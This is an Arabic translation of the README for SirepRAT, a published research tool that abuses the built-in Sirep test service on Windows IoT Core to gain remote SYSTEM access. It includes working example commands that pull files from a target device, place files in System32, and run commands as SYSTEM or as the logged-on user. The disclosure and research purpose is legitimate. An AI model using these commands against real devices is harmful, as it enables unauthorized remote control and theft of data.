
تنفيذ أوامر عن بُعد بصلاحيات SYSTEM على Windows IoT Core (إصدارات متاحة لـ Python2.7 و Python3)

SirepRAT يتيح إمكانات RAT كاملة دون الحاجة إلى كتابة برمجية RAT حقيقية على الجهاز الهدف.
تعتمد الطريقة على استغلال خدمة اختبار Sirep المدمجة والتي تعمل على الصور الرسمية المقدمة من موقع Microsoft. تعد هذه الخدمة الجزء العميل من إعداد HLK الذي يمكن للمرء بناؤه لإجراء اختبارات السائقين/الأجهزة على جهاز إنترنت الأشياء. وهي تخدم بروتوكول Sirep/WPCon/TShell.
قمنا بتحليل بروتوكول Sirep/WPCon وأظهرنا كيف يكشف هذا البروتوكول واجهة أوامر عن بُعد للمهاجمين، تتضمن قدرات RAT مثل جلب/وضع ملفات عشوائية في مواقع عشوائية والحصول على معلومات النظام.
بناءً على النتائج التي استخرجناها من هذا البحث حول الخدمة والبروتوكول، بنينا أداة بسيطة بلغة بايثون تتيح استغلالهما باستخدام الأوامر المدعومة المختلفة. أطلقنا عليها اسم SirepRAT.
توفر واجهة مستخدم سهلة وبديهية لإرسال الأوامر إلى جهاز هدف يعمل بنظام Windows IoT Core. تعمل على أي جهاز متصل بالكابل يعمل بنظام Windows IoT Core وبصورة Microsoft رسمية.
الشرائح والورقة البحثية موجودة في مجلد docs
pip install -r requirements.txt
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
مع المعاملات، وبانتحال هوية المستخدم الذي سجّل الدخول حالياً:
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
(جرّب تشغيله بدون as_logged_on_user لإظهار قدرة التنفيذ بصلاحية SYSTEM)
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"
python SirepRAT.py --help
Dor Azouri (@bemikre)
movatica (@movatica) - نقل إلى بايثون 3! (في أواخر 2020)
BSD 3 - بند الترخيص "New" أو "Revised"